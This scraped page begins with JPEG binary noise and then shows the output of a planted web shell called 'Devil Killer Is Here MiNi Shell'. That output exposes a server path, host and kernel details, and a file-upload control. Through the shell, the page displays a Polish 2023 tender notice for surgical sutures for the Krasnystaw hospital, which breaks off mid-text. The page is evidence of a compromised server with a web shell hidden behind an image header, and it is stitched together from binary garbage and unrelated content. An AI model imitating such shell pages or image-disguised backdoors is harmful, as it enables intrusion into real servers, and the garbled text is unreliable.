JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230203/0008090601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa nici chirurgicznych do Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110196699</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marka Sobieskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krasnystaw</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">825431522</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spzozkrasnystaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spzozkrasnystaw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa nici chirurgicznych do Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8bbe1b8e-a2dc-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00080906</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00073090/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa szwów chirurgicznych do SPZOZ w Krasnymstawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://ezamowienia.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między 1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy: e-zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl lub poczty elektronicznej zamowienia@spzozkrasnystaw.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>3.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>4.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych <br/>5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować się na Platformie e-zamówienia. Platforma jest dostępna dla każdego zalogowania użytkownika. Rodzaj dostępnych formularzy zależy od posiadanego na Platformie konta. <br/>6.	Użytkownik zalogowany jako konto uproszczone ma dostępne formularze: - Wniosek – służący do zadawania pytań do SWZ, - Inne. <br/>7.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. <br/>8.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>9.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/>10.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/>11.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>12.	Składanie ofert dostępne jest tylko dla użytkowników będących Wykonawcami, posiadającymi uprawnienie do składania ofert. W celu założenia oferty należy przejść do szczegółów postępowania, wybrać zakładkę oferty/wnioski, następnie przycisk złóż ofertę. <br/>13.	Ofertę należy złożyć na właściwym formularzu (aktualnym formularzu ofertowym pobranym z platformy do tego postępowania) – jeśli formularz będzie nieprawidłowy system poinformuje o tym w trakcie składania oferty. <br/>14.	W celu pobrania wzorców formularza (ofertowego, wniosku o dopuszczenie do udziału w postępowaniu lub konkursowego) oraz pozostałych dokumentów postępowania należy przejść do szczegółów postępowania. <br/>15.	Funkcjonalność wypełnienia formularza dostępna jest tylko dla użytkowników będących Wykonawcami posiadającymi uprawnienie do Przygotowania ofert/wniosków/prac konkursowych. <br/>16.	Ofertę należy złożyć przed terminem składania ofert – oferta złożona po terminie nie zostanie przyjęta. <br/>17.	Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem ele<br/>(...)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. <br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem Pani/Pana/Państwa danych osobowych jest Samodzielny Publiczny Zespół Opieki Zdrowotnej <br/>w Krasnymstawie;<br/>2)	Szpital powołał Inspektora Ochrony Danych, z którym może się Pani/Pan/Państwo skontaktować w przypadku jakichkolwiek pytań lub uwag dotyczących przetwarzania Pani/Pana/Państwa danych osobowych oraz przysługujących Pani/Panu/Państwu uprawnień wynikających z RODO. Dane kontaktowe: adres e-mail: daneosobowe@spzozkrasnystaw.pl<br/>3)	Pani/Pana/Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym <br/>z postępowaniem o udzielenie zamówienia publicznego pn. „Dostawa nici chirurgicznych do Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie nr (ZP/230-2/2023) prowadzonym w trybie podstawowym;<br/>4)	odbiorcami Pani/Pana/Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), dalej „ustawa Pzp”; <br/>5)	Pani/Pana/Państwa dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania <br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	Podanie przez Panią/Pana/Państwa danych osobowych ma charakter dobrowolny przy czym podanie przez Panią/Pana/Państwa danych osobowych bezpośrednio Pani/Pana/Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do Pani/Pana/Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO, w tym nie będą podlegały profilowaniu;<br/>8)	posiada Pani/Pan/Państwo:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana/Państwa dotyczących, w tym prawo <br/>do uzyskania kopii tych danych;<br/>−	na podstawie art. 16 RODO prawo do sprostowania (poprawiania) Pani/Pana/Państwa danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych <br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan/Państwo, <br/>że przetwarzanie danych osobowych Pani/Pana/Państwa dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9)	nie przysługuje Pani/Panu/Państwu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana/Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/230-2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 1 - SZWY SYNTETYCZNE, MONOFILAMENTOWE, NIEWCHŁANIALNE </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141121-4 - Szwy chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/><br/>1.1 Punkty w kryterium cena przyznawane będą proporcjonalnie, przy założeniu, że oferta z najniższą ceną uzyska 60 pkt, pozostałe zostaną wyliczone zgodnie ze wzorem Cn/Cb x 60,00 = C<br/>gdzie: Cn - najniższa cena spośród wszystkich ofert<br/> Cb - cena oferty badanej<br/> C - punkty przyznane za cenę oferty<br/><br/><br/>1.2. Punkty w kryterium termin dostaw częściowych – zostaną przyznane zgodnie z następującymi zasadami:<br/>za termin dostawy do 3 dni roboczych, licząc od dnia złożenia zamówienia – 20,00 pkt<br/>za termin dostawy do 4 dni roboczych,, licząc od dnia złożenia zamówienia – 15,00 pkt<br/>za termin dostawy do 5 dni roboczych,, licząc od dnia złożenia zamówienia – 10,00 pkt<br/>za termin dostawy do 6 dni roboczych,, licząc od dnia złożenia zamówienia – 5,00 pkt<br/>za termin dostawy do 7 dni roboczych,, licząc od dnia złożenia zamówienia – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie dostaw cząstkowych, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 7 dni.<br/>Zaproponowanie terminu dostaw cząstkowych dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego. <br/>W przypadku zaoferowania terminu dostaw cząstkowych krótszego niż minimalny, Zamawiający przyjmie do obliczeń termin 3 dni.<br/><br/>1.3. Punkty w kryterium termin rozpatrzenia reklamacji jakościowej - zostaną przyznane zgodnie <br/>z następującymi zasadami:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/> za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/> za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie rozpatrzenia reklamacji jakościowej, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 14 dni.<br/>Zaproponowanie terminu rozpatrzenia reklamacji jakościowej dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 2 - SZWY SYNTETYCZNE, MONOFILAMENTOWE, WCHŁANIALNE- 7 pozycji asortymentowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141121-4 - Szwy chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/><br/>1.1 Punkty w kryterium cena przyznawane będą proporcjonalnie, przy założeniu, że oferta z najniższą ceną uzyska 60 pkt, pozostałe zostaną wyliczone zgodnie ze wzorem Cn/Cb x 60,00 = C<br/>gdzie: Cn - najniższa cena spośród wszystkich ofert<br/> Cb - cena oferty badanej<br/> C - punkty przyznane za cenę oferty<br/><br/><br/>1.2. Punkty w kryterium termin dostaw częściowych – zostaną przyznane zgodnie z następującymi zasadami:<br/>za termin dostawy do 3 dni roboczych, licząc od dnia złożenia zamówienia – 20,00 pkt<br/>za termin dostawy do 4 dni roboczych,, licząc od dnia złożenia zamówienia – 15,00 pkt<br/>za termin dostawy do 5 dni roboczych,, licząc od dnia złożenia zamówienia – 10,00 pkt<br/>za termin dostawy do 6 dni roboczych,, licząc od dnia złożenia zamówienia – 5,00 pkt<br/>za termin dostawy do 7 dni roboczych,, licząc od dnia złożenia zamówienia – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie dostaw cząstkowych, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 7 dni.<br/>Zaproponowanie terminu dostaw cząstkowych dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego. <br/>W przypadku zaoferowania terminu dostaw cząstkowych krótszego niż minimalny, Zamawiający przyjmie do obliczeń termin 3 dni.<br/><br/>1.3. Punkty w kryterium termin rozpatrzenia reklamacji jakościowej - zostaną przyznane zgodnie <br/>z następującymi zasadami:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/> za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/> za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie rozpatrzenia reklamacji jakościowej, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 14 dni.<br/>Zaproponowanie terminu rozpatrzenia reklamacji jakościowej dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 